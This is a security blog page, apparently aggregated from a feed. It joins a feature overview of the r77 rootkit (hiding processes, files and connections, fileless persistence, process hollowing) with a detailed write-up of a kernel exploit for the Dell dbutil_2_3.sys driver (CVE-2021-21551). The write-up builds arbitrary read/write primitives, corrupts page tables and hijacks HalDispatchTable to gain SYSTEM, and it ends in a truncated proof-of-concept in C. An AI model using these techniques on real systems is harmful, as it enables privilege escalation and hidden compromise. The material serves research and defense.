RSS Security

R77-Rootkit - Fileless Ring 3 Rootkit With Installer And Persistence That Hides Processes, Files, Network Connections, Etc...

Ring 3 rootkit

r77 is a ring 3 rootkit that hides the following entities from all processes:

  • Files, directories, junctions, named pipes, scheduled tasks
  • Processes
  • CPU usage
  • Registry keys & values
  • Services
  • TCP & UDP connections

It is compatible with Windows 7 and Windows 10 in both x64 and x86 editions.

Hiding by prefix

All entities whose names start with "$77" are hidden.

Configuration System

The dynamic configuration system allows hiding processes by PID and by name, file system items by full path, TCP & UDP connections on specific ports, etc.

The configuration is stored in HKEY_LOCAL_MACHINE\SOFTWARE\$77config and is writable by any process without elevated privileges. The DACL of this key is set to grant full access to any user.

The $77config key is hidden when RegEdit is injected with the rootkit.


Installer

r77 is deployable using a single file, "Install.exe". It installs the r77 service, which starts before the first user logs on. This background process injects r77 into all currently running processes, as well as into processes that spawn later. Two service processes are needed to inject into both 32-bit and 64-bit processes. Both service processes are hidden by ID using the configuration system.

Uninstall.exe removes r77 from the system and gracefully detaches the rootkit from all processes.

Child process hooking

When a process creates a child process, r77 is injected into the new process before it can run any of its own instructions. The function NtResumeThread is always called when a new process is created, so it is a suitable target to hook. Because a 32-bit process can spawn a 64-bit child process and vice versa, the r77 service provides a named pipe to handle child process injection requests.

In addition, there is a periodic check every 100ms for new processes that might have been missed by child process hooking. This is necessary because some processes are protected and cannot be injected, such as services.exe.

In-memory injection

The rootkit DLL (r77-x86.dll and r77-x64.dll) can be injected into a process from memory and doesn't need to be stored on the disk. Reflective DLL injection is used to achieve this. The DLL provides an exported function that, when called, loads all sections of the DLL, handles dependency loading and relocations, and finally calls DllMain.

Fileless persistence

The rootkit resides in the system memory and does not write any files to the disk. This is achieved in multiple stages.

Stage 1: The installer creates two scheduled tasks, one for the 32-bit and one for the 64-bit r77 service. A scheduled task does require a file to be stored ($77svc32.job and $77svc64.job), which is the only exception to the fileless concept. However, scheduled tasks are also hidden by prefix once the rootkit is running.

The scheduled tasks start powershell.exe with the following command line:


The command is inline and does not require a .ps1 script. Here, the .NET Framework capabilities of PowerShell are used to load a C# executable from the registry and execute it in memory. Because the command line has a maximum length of 260 characters (MAX_PATH), there is only enough room to perform a simple Assembly.Load().EntryPoint.Invoke().

Stage 2: The executed C# binary is the stager. It will create the r77 service processes using process hollowing. The r77 service is a native executable compiled in both 32-bit and 64-bit separately. The parent process is spoofed and set to winlogon.exe for additional obscurity. In addition, the two processes are hidden by ID and are not visible in the task manager.

No executables or DLLs are ever stored on the disk. The stager is stored in the registry and loads the r77 service executable from its resources.

The PowerShell and .NET dependencies are present in a fresh installation of Windows 7 and Windows 10. Please review the documentation for a complete description of the fileless initialization.


Hooks

Detours is used to hook several functions from ntdll.dll. These low-level syscall wrappers are called by any WinAPI or framework implementation.

  • NtQuerySystemInformation
  • NtResumeThread
  • NtQueryDirectoryFile
  • NtQueryDirectoryFileEx
  • NtEnumerateKey
  • NtEnumerateValueKey
  • EnumServiceGroupW
  • EnumServicesStatusExW
  • NtDeviceIoControlFile

The only exception is advapi32.dll. Two functions are hooked to hide services. This is because the actual service enumeration happens in services.exe, which cannot be injected.

Test environment

The Test Console can be used to inject r77 into, or detach r77 from, individual processes.

Technical Documentation

Please read the technical documentation for a comprehensive overview of r77 and its internals, and of how to deploy and integrate it.


Exploit Development: CVE-2021-21551 - Dell ‘dbutil_2_3.sys’ Kernel Exploit Writeup

16 May 2021 at 00:00


Recently, I said I was going to focus on browser exploitation, with Advanced Windows Exploitation (AWE) being canceled. With AWE canceled two years in a row, I found myself craving binary exploitation training, so I enrolled in HackSysTeam’s Windows Kernel Exploitation Advanced course, which takes place at the end of this month at CanSecWest. I have already delved into the basics of kernel exploitation, and I had been looking to complete a few exercises to shake the rust off and prepare for the course.

I stumbled across this SentinelOne blog post the other day, which outlined a few vulnerabilities in Dell’s dbutil_2_3.sys driver, including a memory corruption vulnerability. Although this vulnerability was attributed to Kasif Dekel, it was apparently discovered earlier by Yarden Shafir and Satoshi Tanda, coworkers of mine at CrowdStrike.

After reading Kasif’s blog post, which practically outlines the entire vulnerability and does an awesome job of explaining things and giving researchers a wonderful starting point, I decided that I would use this opportunity to get ready for Windows Kernel Exploitation Advanced at the end of the month.

Because Kasif leverages a data-only attack rather than something like corrupting page table entries, I also decided to try to recreate this exploit and achieve a full SYSTEM shell via page table corruption. The final result ended up being a weaponized exploit. I wanted to use this blog post to showcase a few of the “checks” that need to be bypassed in the kernel in order to reach the final arbitrary read/write primitive, as well as why modern mitigations such as Virtualization-Based Security (VBS) and Hypervisor-Protected Code Integrity (HVCI) are so important in today’s threat landscape.

In addition, three of my favorite things to do are writing, conducting vulnerability research, and writing code, so regardless of whether you find this blog helpful or redundant, I just love to write blogs at the end of the day :-). As I mentioned earlier, I also hope this blog shows why it is important for mitigations like VBS/HVCI to become more mainstream: these two mitigations in tandem could have prevented this specific method of exploitation (note that other methods are still viable, such as a data-only attack, as Kasif points out).

Arbitrary Write Primitive

I will not attempt to reinvent the wheel here, as Kasif’s blog post explains very well how this vulnerability arises. The tl;dr is that there is an IOCTL code, which any client can trigger with a call to DeviceIoControl, that eventually reaches a memmove routine whose arguments are taken from the user-supplied buffer of the vulnerable IOCTL routine.

Let’s get started with the analysis. As is customary with kernel exploits, we first need a way to interact with the driver, so the first step is to obtain a handle to it. Why is this? The driver is an object in kernel mode, and since we are in user mode, we need some intermediary way to interact with it. To find that intermediary, we need to look at how the DEVICE_OBJECT is created. A DEVICE_OBJECT generally has a symbolic link referencing it, which allows clients to interact with the driver; this object is what clients interact with. In our case, we can use IDA to locate the name of the symbolic link. The DriverEntry function is like a main() function in a kernel-mode driver. DriverEntry functions are prototyped to accept a pointer to a DRIVER_OBJECT, which is essentially a “representation” of a driver, and a RegistryPath. Looking at Microsoft’s documentation of the DRIVER_OBJECT structure, we can see that one of its members is a pointer to a DEVICE_OBJECT.

After loading the driver in IDA, you will see a function called DriverEntry in the Functions window, under Function name.

This entry point function, as we can see, performs a jump to another function, sub_11008. Let’s examine this function in IDA.

As we can see, the \Device\DBUtil_2_3 string is used in the call to IoCreateDevice to create a DEVICE_OBJECT. For our purposes, since we are a user-mode client, the target symbolic link will be \\.\DBUtil_2_3 (written as "\\\\.\\DBUtil_2_3" in a C string literal).

Now that we know what the target symbolic link is, we then need to leverage CreateFile to obtain a handle to this driver.

We will start piecing the code together shortly, but this is how we obtain a handle to interact with the driver.

The next function we need to call is DeviceIoControl. This function allows us to pass the handle to the driver as an argument and send data to the driver. However, drivers create I/O Control (IOCTL) routines that perform different actions based on client input, and this driver exposes many of them. One way to determine whether a function in IDA contains IOCTL routines, although it isn’t foolproof, is to look for many code branches with cmp eax, DWORD instructions. IOCTL codes are DWORDs, and drivers, especially enterprise-grade drivers, will perform many different actions based on the IOCTL specified by the client. Since this driver doesn’t contain many functions, it is relatively trivial to locate a function that performs many of these comparisons.

Per Kasif’s research, the vulnerable IOCTL in this case is 0x9B0C1EC8. In this function, sub_11170, we can look for a cmp eax, 9B0C1EC8h instruction; if the vulnerable IOCTL code is specified, whatever code branches out from that compare should lead us to the vulnerable code path.
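It can help to decode the IOCTL code itself using the standard CTL_CODE bit layout from the Windows driver headers. The portable C sketch below only splits and rebuilds the code's fields; ioctl_fields, decode_ioctl, encode_ioctl and print_ioctl are hypothetical helper names, not part of the driver or of the final POC.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/* Bit layout produced by the CTL_CODE macro:
 *   bits 31-16  DeviceType
 *   bits 15-14  RequiredAccess (0 = FILE_ANY_ACCESS)
 *   bits 13-2   Function
 *   bits  1-0   TransferType   (0 = METHOD_BUFFERED) */
typedef struct {
    uint32_t device_type;
    uint32_t access;
    uint32_t function;
    uint32_t method;
} ioctl_fields;

/* Split an IOCTL code into its four fields. */
static ioctl_fields decode_ioctl(uint32_t code)
{
    ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFFu;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2) & 0xFFFu;
    f.method      = code & 0x3u;
    return f;
}

/* Rebuild a code from its fields, taking arguments in the same order
 * as CTL_CODE(DeviceType, Function, Method, Access). */
static uint32_t encode_ioctl(uint32_t device_type, uint32_t function,
                             uint32_t method, uint32_t access)
{
    assert(device_type <= 0xFFFFu && function <= 0xFFFu);
    assert(method <= 3u && access <= 3u);
    return (device_type << 16) | (access << 14) | (function << 2) | method;
}

/* Print a code in human-readable form. */
static void print_ioctl(uint32_t code)
{
    static const char *const methods[] = {
        "METHOD_BUFFERED", "METHOD_IN_DIRECT",
        "METHOD_OUT_DIRECT", "METHOD_NEITHER"
    };
    ioctl_fields f = decode_ioctl(code);
    printf("0x%08X: DeviceType=0x%04X Function=0x%03X Access=%u %s\n",
           (unsigned)code, (unsigned)f.device_type, (unsigned)f.function,
           (unsigned)f.access, methods[f.method]);
}
```

Under this layout, 0x9B0C1EC8 decodes to device type 0x9B0C, function 0x7B2, FILE_ANY_ACCESS and METHOD_BUFFERED, and 0x9B0C1EC4 (the IOCTL used later for reading) differs only in its function number, 0x7B1. FILE_ANY_ACCESS means the I/O manager does not demand read or write access on the handle for this request, and METHOD_BUFFERED means the I/O manager copies the caller's input into a kernel-allocated system buffer (and copies output back from it), which is consistent with our QWORD array later showing up at a kernel-mode address.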

This compare, if successful, jumps to an xor edx, edx instruction.

After the XOR instruction executes, program execution reaches the loc_113A2 routine, which performs a call to the function sub_15294.

If you recall from Kasif’s blog post, this is the function in which the vulnerable code resides. We can see this by the call to memmove inside the function.

What primitive do we have here? As Kasif points out, we “can control the arguments to memmove” in this function. We know that we can reach this function, sub_15294, which contains the call to memmove. Let’s take a look at the prototype for memmove: void *memmove(void *dest, const void *src, size_t count);

As seen above, memmove copies count bytes from the memory block the source pointer references into the memory block the destination pointer references. If we can control the arguments to memmove, this gives us a vanilla arbitrary write primitive: we will be able to overwrite kernel-mode memory of our choosing with data from our own user-supplied buffer! This is great, but there are tons of code branches in this driver. We need to make sure that, from the time our IOCTL code is checked and we are directed towards our code path, any compare statements and other checks that arise are successfully dealt with, so we can reach the final memmove routine. Let’s begin by sending an arbitrary QWORD to kernel mode.
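The short, user-mode-only C sketch below illustrates the memmove semantics this primitive relies on: whoever chooses dest and src chooses where bytes land and where they come from, overlapping regions are handled correctly, and the return value is simply dest. The helper insert_char is hypothetical and was picked only because its source and destination overlap, the case memmove (unlike memcpy) is defined for.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* memmove(dest, src, count) copies count bytes from src to dest as if
 * through a temporary buffer, so overlapping regions are safe, and it
 * returns dest. Under the Windows x64 calling convention, dest arrives
 * in RCX, src in RDX and count in R8. */

/* Insert c at index pos of the NUL-terminated string s, whose buffer
 * holds cap bytes. Returns 0 on success, -1 if pos is invalid or the
 * result would not fit. */
static int insert_char(char *s, size_t cap, size_t pos, char c)
{
    size_t len = strlen(s);
    if (pos > len || len + 2 > cap)
        return -1;
    /* Shift the tail, including the terminating NUL, right by one byte.
     * Source and destination overlap, so memcpy would be undefined here. */
    void *ret = memmove(s + pos + 1, s + pos, len - pos + 1);
    assert(ret == s + pos + 1); /* memmove returns its dest argument */
    (void)ret;                  /* avoid an unused warning under NDEBUG */
    s[pos] = c;
    return 0;
}
```

For example, inserting 'X' at index 1 of "abcd" in an 8-byte buffer yields "aXbcd". The same contract explains the later observation that memmove's return value is the buffer the data was copied into.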

After loading the driver on the debuggee machine, we can start a kernel-mode debugging session in WinDbg. After verifying the driver is loaded, we can use IDA to locate the offset to this function and then set a breakpoint on it.

Next, after running the POC on the debuggee machine, we can see execution hits the breakpoint successfully and the target instruction is currently in RIP and our target IOCTL is in the lower 32-bits of RAX, EAX.

After executing the cmp statement and the jump, we can see now that we have landed on the XOR instruction, per our static analysis with IDA earlier.

Then, execution hits the call to the function (sub_15294) that contains the memmove routine - so far so good!

We can see now we have landed inside of the function call, and a new stack frame is being created.

If we dereference the value currently in RCX, we can see our buffer.

We then can see that, after stepping through the sub rsp, 0x40 stack allocation and the mov rbx, rcx instruction, the value 0x8 is going to be placed into ECX and used for the cmp ecx, 0x18 instruction.

What is this number? It is actually the size of our buffer, which is currently one QWORD. Obviously this compare will fail, and an NTSTATUS code of 0xC000000D, STATUS_INVALID_PARAMETER, is returned to the client. This is the driver’s way of letting the client know that one of the arguments in the IOCTL call wasn’t correct. This means that if we want to reach the memmove routine, we will need to send at least 0x18 bytes of data.
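STATUS_INVALID_PARAMETER can be picked apart with the NTSTATUS bit layout documented in Microsoft's [MS-ERREF] specification. The C sketch below works on plain uint32_t values so it compiles anywhere; the nt_* helper names are hypothetical, and nt_success is intended to give the same answer as the NT_SUCCESS macro from the Windows headers, which reads the status as a signed LONG and checks that it is non-negative.

```c
#include <assert.h>
#include <stdint.h>

/* NTSTATUS layout ([MS-ERREF]):
 *   bits 31-30  Severity (0 success, 1 informational, 2 warning, 3 error)
 *   bit  29     Customer flag (set for non-Microsoft codes)
 *   bit  28     Reserved (N)
 *   bits 27-16  Facility
 *   bits 15-0   Code */
static unsigned nt_severity(uint32_t status) { return status >> 30; }
static unsigned nt_customer(uint32_t status) { return (status >> 29) & 1u; }
static unsigned nt_facility(uint32_t status) { return (status >> 16) & 0xFFFu; }
static unsigned nt_code(uint32_t status)     { return status & 0xFFFFu; }

/* Success and informational codes have bit 31 clear, i.e. they are
 * non-negative when interpreted as a signed 32-bit value. */
static int nt_success(uint32_t status) { return (status & 0x80000000u) == 0; }
```

For 0xC000000D this gives severity 3 (error), facility 0 and code 0xD, so NT_SUCCESS is false. A user-mode caller of DeviceIoControl would normally see this status translated into a Win32 error code through GetLastError rather than the raw NTSTATUS.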

Refactoring our code, let’s try to send a contiguous buffer of 0x18 bytes of data.

After hitting the sub_15294 function, we see that this time the cmp ecx, 0x18 check will be passed.

After stepping through a few more instructions, past the test rax, rax bitwise test and the jump instruction, we land on a load effective address (lea) instruction, and we can see our call to memmove, although WinDbg shows no symbol for it.

Since we are about to hit the call to memmove, and we are on a 64-bit system with no arguments being moved onto the stack, we know the Microsoft x64 calling convention (which resembles __fastcall) is in use. Because of this, we know that, based on the prototype, the first argument will be placed into RCX, which will be the destination buffer (i.e. where the memory will be written to). We also know that RDX will contain the source buffer (i.e. where the memory comes from), and R8 the number of bytes to copy.

Stepping to the mov ecx, dword ptr [rsp+0x30] instruction, which moves the DWORD stored at RSP+0x30 into ECX, we can see that a value of 0x00000000 is about to be moved into ECX.

We then see that the value on the stack, at an offset of 0x28, is added to the value in RCX, which is currently zero.

We then can see that invalid memory will be dereferenced in the call to memmove.

Why is this? Recall the prototype of memmove: this function accepts pointers to memory. Since we passed junk values, these addresses are invalid. Because of this, let’s modify our POC again to see if we can get the desired result. As a proof of concept, let’s use KUSER_SHARED_DATA at an offset of 0x800, which is 0xFFFFF78000000800.

This time, per Kasif’s research, we will send a 0x20-byte buffer. Kasif points out that, before reaching the call to memmove, the routine indexes our buffer at an offset of 0x8 (the destination) and 0x18 (the source).

After re-executing the POC, let’s break again right before the call to memmove.

We can see that this time, four bytes of 0x42 will be loaded into ECX.

Then, we can clearly see that the value on the stack at RSP+0x28 will be added to RCX. The final result is 0xFFFFF78042424242.

We then can see that, before the call, another part of our buffer is moved into RDX as the source buffer. This gives us an arbitrary write primitive! Data we control will overwrite the memory at the address we supply.

The issue, however, is with the destination address. We were attempting to target 0xFFFFF78000000800, but our address got mangled into 0xFFFFF78042424242. It seems that the lower 32 bits of one of our user-supplied QWORDs are added to the destination address first. If we resend the exploit with 0x0000000000000000 in place of 0x4242424242424242, we can “bypass” this issue: a value of 0 is added, so our target address remains unmangled.

After sending the POC again, we can see that the correct target address is loaded into RCX.

Then, as expected, our arguments are supplied properly to the call to memmove.

After stepping over the function call, we can see that our arbitrary write primitive has successfully worked!

Again, thank you to Kasif for his research on this! Now, let’s talk about the arbitrary read primitive, which is very similar!

Arbitrary Read Primitive

As we know, whenever we supply arguments to the vulnerable memmove routine used for the arbitrary write primitive, we can supply the “what” (our data) and the “where” (where we write the data). However, recall from the successful arguments shown earlier that, since memmove accepts two pointers, the argument in RDX, which is a pointer to 0x4343434343434343, is a kernel-mode address. This means that, at some point between our invocation of DeviceIoControl and the memmove call, our array of QWORDs was transferred to kernel mode so it could be used by the driver in the call to memmove. Notice, however, that the target address, the value in RCX, is completely controllable by us, meaning the driver doesn’t create a pointer to that QWORD; we supply it directly. And, since memmove interprets that value as a pointer, we can overwrite whatever memory it points to, which in this case is any address we want to corrupt.

What if, however, there were a way to do this in reverse? What if, in place of the kernel-mode address that points to 0x4343434343434343, we could supply our own memory address directly, just as we control the target address we move memory to, instead of having the driver create a pointer for us?

This means, instead of having something like this for the source address:

ffffc605`24e82998	43434343`43434343

What if we could just pass our own data as such:

43434343`43434343	DATA

Here, 0x4343434343434343 would be a value we supply, instead of the kernel creating a pointer to it for us. That way, memmove will interpret this value itself as a pointer. This means that if we supply a memory address, whatever that memory address points to (e.g. nt!MiGetPteAddress+0x13 when dereferenced) is copied to the target buffer!

This could potentially go one of two ways. Option one would be to copy this data into our own pointer in C. However, since none of our user-mode addresses make it to the driver, and the driver places our buffer in kernel mode before leveraging it, the better option might be to supply an output buffer to DeviceIoControl and see whether the data copied by memmove is written to the output buffer.

The latter option makes sense, as this IOCTL allows any client to supply a buffer and have it copied. This driver most likely isn’t expecting unauthorized clients to call this IOCTL, meaning the input and output buffers are most likely used by other kernel-mode components or legitimate user-mode clients that need an easy way to pass and receive data. Because of this, it is quite likely expected behavior for the output buffer to contain memmove data. The problem is that we need to find another memmove routine that allows us to essentially do the inverse of what we did with the arbitrary write primitive.

When I talked through my thought process with a peer of mine, VoidSec, he pointed me towards Metasploit, which already has this concept outlined in its POC.

Doing a bit more reverse engineering, we can see that there is more than one way to reach the arbitrary write memmove routine.

Looking into sub_15294, we can see that this is the same memmove routine leveraged before.

However, since another IOCTL routine invokes this memmove routine, it is a prime candidate for checking whether anything about this code path is different (e.g. why create another routine to do the same thing twice? Perhaps it is used for something else, like reading memory or copying memory in a different way). Additionally, recall that when we performed the arbitrary write, the routines indexed our buffer at 0x8 and 0x18. The call to memmove via the new IOCTL could set up our buffer so that it is indexed at different offsets, meaning we may be able to achieve an arbitrary read.

It is possible to reach this routine through the IOCTL 0x9B0C1EC4.

Let’s update our POC to trigger the new IOCTL and see if anything is returned in the output buffer. As last time, we will set the second value of our QWORD array to the address we want to interact with (in this case, read from) and set everything else to 0. Then, we will reuse the same array of QWORDs as the output buffer and see if anything was written to it.

We can use IDA to identify the offset within the driver of the cmp eax, 0x9B0C1EC4 instruction, which is sub_11170+75.

We know that the first IOCTL code we will hit is the arbitrary write IOCTL, so we can pass over the first compare and then hit the second.

We then can see execution reaches the function housing the memmove routine, sub_15294.

After stepping through a few instructions, we can see our input buffer for the read primitive being propagated and set up for the upcoming call to memmove.

Then, the first part of the buffer is moved into RAX.

Then, the target address we would like to dereference and read from is loaded into RAX.

Then, the target address of KUSER_SHARED_DATA is loaded into RCX and, as we can see, will then be loaded into RDX. This is great for us, as RDX holds the second argument of a function call under the Windows x64 calling convention. Since memmove accepts a pointer to a memory address, this address will be dereferenced and the memory it points to copied into a target buffer (which hopefully is returned in the output buffer parameter of DeviceIoControl).

Recall that in our arbitrary write routine, the second parameter, 4343434343434343, was pointed to by a kernel-mode address. This time, we control the address itself (0xFFFFF78000000000), and this address will be dereferenced, with whatever it points to being written to the buffer pointed to by RCX. Since we saw with the write primitive that we control the arguments to memmove, we can expect that, although the value in RCX is in kernel mode, the data will be bubbled back up into user mode and placed in our output buffer! Just before the return from memmove, we can see that the return value is the buffer the data was copied into, and that this buffer contains 0x0fa0000000000000! Looking in the debugger, this is the value stored at KUSER_SHARED_DATA.

We really don’t need to do any more debugging/reverse engineering as we know that we completely control these arguments, based on our write primitive. Pressing g in the debugger, we can see that in our POC console, we have successfully performed an arbitrary read!

We indexed each element of the QWORD array we sent, per our code, and we can see the last element contains the dereferenced contents of the address we wanted to read from! Now that we have a vanilla one-QWORD arbitrary read/write primitive, we can get into our exploitation path.

Why Perform a Data-Only Attack When You Can Corrupt All Of The Memory and Deal With All of the Mitigations? Let’s Have Some Fun And Make Life Artificially Harder On Ourselves!

First, please note I have more in-depth posts on leveraging page table entries and memory paging for kernel exploitation found here and here.

Our goal with this exploitation path will be the following:

  1. Write our shellcode somewhere that is writable in the driver’s virtual address space
  2. Locate the base of the page table entries
  3. Calculate the address of the page table entry for the memory page where our shellcode lives
  4. Corrupt the page table entry to make the shellcode page RWX, circumventing SMEP and bypassing kernel no-eXecute (DEP)
  5. Overwrite nt!HalDispatchTable+0x8 and circumvent kCFG (kernel Control-Flow Guard). (Note that if kCFG were fully enabled, VBS/HVCI would also be enabled, rendering this technique useless. kCFG does still have some functionality even when VBS/HVCI is disabled, such as performing bitwise tests to ensure user-mode addresses aren’t called from kernel mode. This technique simply “circumvents” kCFG by calling a pointer to our shellcode, which exists in kernel mode from the first step.)

First, we need to find a place in kernel mode that we can write our shellcode to. KUSER_SHARED_DATA is a perfectly fine solution, but there is also a good candidate within the driver itself: its .data section, which is already writable.

We can see that we have a ton of room to work with, in terms of kernel-mode writable memory. Our shellcode is approximately 9 QWORDs, so we will have more than enough room to place it here.

We will start our shellcode out at .data+0x10. Since we know where the shellcode will go, and since we know it resides in the dbutil_2_3.sys driver, we need to add a routine to our exploit that can retrieve the load address of the kernel, for PTE indexing calculations, and the base address of the driver.

Note that this assumes the process invoking this exploit runs at medium integrity.

Since the address we want to write to is at an offset of 0x3000 (the offset to .data) + 0x10 (the offset to the code cave) from the base address of dbutil_2_3.sys, the next step is to locate the page table entry for this memory address, which is already a writable kernel-mode page (you could also use KUSER_SHARED_DATA+0x800). In order to calculate the location of the page table entry, we first need to bypass page table randomization, a mitigation introduced in Windows 10 1607.

This is because we need the base of the page table entries in order to locate the PTE for a specific page in memory (on Windows, the page table entries are mapped into virtual memory as a contiguous array). The kernel function nt!MiGetPteAddress contains, dynamically, the base of the page table entries at an offset of 0x13, since this function is used to locate page table entries.
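As general background on what "the page table entry for a page" means: with x64 four-level paging and 4 KB pages, the processor splits a canonical 48-bit virtual address into four 9-bit table indices and a 12-bit page offset, and each table holds 512 eight-byte entries. The portable C sketch below shows only this textbook decomposition, as described in the paging chapter of the Intel SDM (Vol. 3A); va_parts and split_va are hypothetical names, and the code does not reproduce nt!MiGetPteAddress or involve the randomized PTE base.

```c
#include <assert.h>
#include <stdint.h>

/* Table indices of a canonical 48-bit virtual address under x64
 * 4-level paging with 4 KB pages. Each table has 512 (2^9) entries of
 * 8 bytes, so every index is 9 bits wide. Bits 63-48 are sign-extension
 * copies of bit 47 and take no part in the walk. */
typedef struct {
    unsigned pml4;   /* bits 47-39: page-map level-4 index            */
    unsigned pdpt;   /* bits 38-30: page-directory-pointer index      */
    unsigned pd;     /* bits 29-21: page-directory index              */
    unsigned pt;     /* bits 20-12: page-table index (selects the PTE) */
    unsigned offset; /* bits 11-0:  byte offset within the 4 KB page  */
} va_parts;

static va_parts split_va(uint64_t va)
{
    va_parts p;
    p.pml4   = (unsigned)((va >> 39) & 0x1FFu);
    p.pdpt   = (unsigned)((va >> 30) & 0x1FFu);
    p.pd     = (unsigned)((va >> 21) & 0x1FFu);
    p.pt     = (unsigned)((va >> 12) & 0x1FFu);
    p.offset = (unsigned)(va & 0xFFFu);
    return p;
}
```

For KUSER_SHARED_DATA+0x800 (0xFFFFF78000000800), this yields a PML4 index of 0x1EF, zero PDPT, PD and PT indices, and a page offset of 0x800.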

Let’s use our read primitive to locate the base of the page table entries (note that I used a static offset from the base of the kernel to nt!MiGetPteAddress, mostly because I am focused on the exploitation phase of this CVE, and not making this exploit portable. You’ll need to update this based on your patch level).

Here we can see we obtain the initial handle to the driver, create a buffer based on our read primitive, send it to the driver, and obtain the base of the page table entries. Then, we programmatically can replicate what nt!MiGetPteAddress does in order to fetch the correct page table entry in the array for the page we will be writing our shellcode to.

Now that we have calculated the page table entry for where our shellcode will be written to, let’s dereference it in order to preserve the current PTE bits (the page’s permissions), so we can modify this value later.

Checking in WinDbg, we can also see this is the case!

Now that we have the virtual address for our page table entry and we have extracted the current bits that comprise the entry, let’s write our shellcode to .data+0x10 (dbutil_2_3+0x3010).

After execution of the updated POC, we can clearly see that the arbitrary write routines worked, and our shellcode is located in kernel mode!

Perfect! Now that we have our shellcode in kernel mode, we need to make it executable. After all, the .data section of a PE or driver is read/write. We need to make this an executable region of memory. Since we have the PTE bits already stored, we can update our page table entry bits, stored in our exploit, to contain the bits with the no-eXecute bit cleared, and leverage our arbitrary write primitive to corrupt the page table entry and make it read/write/execute (RWX)!

Perfect! Now that we have made our memory region executable, we need to overwrite the pointer at nt!HalDispatchTable+0x8 with this memory address. Then, invoking ntdll!NtQueryIntervalProfile from user mode will trigger a call through this QWORD! However, before overwriting nt!HalDispatchTable+0x8, let’s first use our read primitive to preserve the current pointer, so we can put it back after executing our shellcode to ensure system stability, as the Hardware Abstraction Layer is very important on Windows and the dispatch table is referenced regularly.

After preserving the pointer located at nt!HalDispatchTable+0x8 we can use our write primitive to overwrite nt!HalDispatchTable+0x8 with a pointer to our shellcode, which resides in kernel mode memory!

Perfect! At this point, if we invoke nt!HalDispatchTable+0x8’s pointer, we will be calling our shellcode! The last step here, besides restoring everything, is to resolve ntdll!NtQueryIntervalProfile, which eventually performs a call to [nt!HalDispatchTable+0x8].

Then, we can finish up our exploit by adding in the restoration routine to restore nt!HalDispatchTable+0x8.

Let’s set a breakpoint on nt!NtQueryIntervalProfile, which will be reached even though the call originates from ntdll.dll.

After hitting the breakpoint, let’s continue to step through the function until we hit the call nt!KeQueryIntervalProfile function call, and let’s use t to step into it.

Stepping through approximately 9 instructions inside of nt!KeQueryIntervalProfile, we can see that we are not directly calling [nt!HalDispatchTable+0x8]; instead, we are calling nt!guard_dispatch_icall. This is part of kCFG, or kernel Control-Flow Guard, which validates indirect function calls (e.g. calling a function pointer).

Clearly, as we can see, the value of [nt!HalDispatchTable+0x8] is pointing to our shellcode, meaning that kCFG should block this. However, kCFG actually requires Virtualization-Based Security (VBS) to be fully implemented. We can see, though, that kCFG has some functionality in kernel mode even if it isn’t implemented full scale. The routines still exist in the kernel; normally, they would check a bitmap of all valid indirect call targets to determine whether the value about to be placed into RAX is a “valid target”, meaning whether, when the bitmap was created at compile time, the address existed and was part of a valid control-flow transfer.

However, since VBS is not mainstream yet, requires specific hardware, and because this exploit is being developed in a virtual machine, we can disregard the VBS side for now (note that this is why mitigations like VBS/HVCI/HyperGuard/etc. are important, as they do a great job of thwarting these types of memory corruption vulnerabilities).

Stepping through the call to nt!guard_dispatch_icall, we can actually see that all this routine does essentially, since VBS isn’t enabled, is bitwise test the target address in RAX to confirm it isn’t a user-mode address (basically it checks to see if it is sign-extended). If it is a user-mode address, you’ll actually get a bug check and BSOD. This is why I opted to keep our shellcode in kernel mode, so we can pass this bitwise test!
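The user-mode check described above relies on x64 canonical addressing: with 48-bit virtual addresses, bits 63 through 47 must all be equal, so user-mode addresses have the top bit clear and kernel-mode addresses have it set. The C sketch below is a simplified model of that idea, not the actual instruction sequence inside nt!guard_dispatch_icall; addr_kind, is_canonical and classify are hypothetical names.

```c
#include <assert.h>
#include <stdint.h>

typedef enum { ADDR_NONCANONICAL, ADDR_USER, ADDR_KERNEL } addr_kind;

/* With 48-bit virtual addresses, an address is canonical when bits
 * 63-47 are all copies of bit 47 (sign-extended from bit 47). */
static int is_canonical(uint64_t va)
{
    uint64_t top = va >> 47; /* the 17 bits 63..47 */
    return top == 0 || top == 0x1FFFFu;
}

/* User-mode half: top bit clear. Kernel-mode half: top bit set. */
static addr_kind classify(uint64_t va)
{
    if (!is_canonical(va))
        return ADDR_NONCANONICAL;
    return (va >> 63) ? ADDR_KERNEL : ADDR_USER;
}
```

This sketch assumes four-level paging; with five-level paging (LA57), addresses are sign-extended from bit 56 instead, so the boundary constants would change.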

Then, after stepping through everything, we can see now that control-flow transfer has been handed off to our shellcode.

From here, we can see we have successfully obtained NT AUTHORITY\SYSTEM privileges!

“When Napoleon lay at Boulogne for a year with his flat-bottom boats and his Grand Army, he was told by someone ‘There are bitter weeds in VBS/HVCI/kCFG’”

Although this exploit was arduous to create, it clearly shows why data-only attacks, such as the _SEP_TOKEN_PRIVILEGES method outlined by Kasif, are optimal: they bypass pretty much every memory corruption related mitigation.

Note that VBS/HVCI actually create an additional security boundary. When VBS is enabled, page table entries are managed by a higher security boundary, Virtual Trust Level 1 (VTL 1), which is the secure kernel. This means it would not be possible to perform PTE manipulation as we did. Additionally, even if it were possible, HVCI is essentially Arbitrary Code Guard (ACG) in the kernel, meaning it also wouldn’t be possible to manipulate memory permissions as we did. These two mitigations would also allow kCFG to be fully implemented, meaning our control-flow transfer would have failed as well.

The advisory and patch for this vulnerability can be found here! Please patch your systems or simply remove the driver.

Thank you again to Kasif for this original research! This was certainly a fun exercise :-). Until next time - peace, love, and positivity :-).

Here is the final POC, which can be found on my GitHub:

// CVE-2021-21551: Dell 'dbutil_2_3.sys' Memory Corruption
// Original research:
// Author: Connor McGarr (@33y0re)

#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>

// Vulnerable IOCTL
#define IOCTL_READ_CODE 0x9B0C1EC4

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Obtain the kernel base and driver base
unsigned long long kernelBase(char name[])
	// Defining EnumDeviceDrivers() and GetDeviceDriverBaseNameA() parameters
	LPVOID lpImageBase[1024];
	DWORD lpcbNeeded;
	int drivers;
	char lpFileName[1024];
	unsigned long long imageBase;

	BOOL baseofDrivers = EnumDeviceDrivers(

	// Error handling
	if (!baseofDrivers)
